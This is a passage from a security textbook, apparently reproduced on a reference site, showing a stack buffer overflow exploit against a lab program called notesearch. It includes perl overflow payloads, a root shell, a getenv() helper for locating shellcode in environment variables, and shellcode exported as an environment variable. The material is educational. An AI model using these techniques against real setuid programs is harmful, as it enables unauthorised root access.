Graphics Programs Reference
In-Depth Information
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2# whoami
root
s
h-3.2#
The target address is repeated enough times to overflow the return address,
and execution returns into the NOP sled in the environment variable, which
inevitably leads to the shellcode. In situations where the overflow buffer isn't
large enough to hold shellcode, an environment variable can be used with
a large NOP sled. This usually makes exploitations quite a bit easier.
A huge NOP sled is a great aid when you need to guess at the target
return addresses, but it turns out that the locations of environment variables
are easier to predict than the locations of local stack variables. In C's standard
library there is a function called
getenv()
, which accepts the name of an environ-
ment variable as its only argument and returns that variable's memory address.
The code in getenv_example.c demonstrates the use of
getenv()
.
getenv_example.c
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
printf("%s is at %p\n", argv[1], getenv(argv[1]));
}
When compiled and run, this program will display the location of a given
environment variable in its memory. This provides a much more accurate
prediction of where the same environment variable will be when the target
program is run.
reader@hacking:~/booksrc $ gcc getenv_example.c
reader@hacking:~/booksrc $ ./a.out SHELLCODE
SHELLCODE is at 0xbffff90b
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
s
h-3.2#
This is accurate enough with a large NOP sled, but when the same thing
is attempted without a sled, the program crashes. This means the environ-
ment prediction is still off.
reader@hacking:~/booksrc $ export SLEDLESS=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
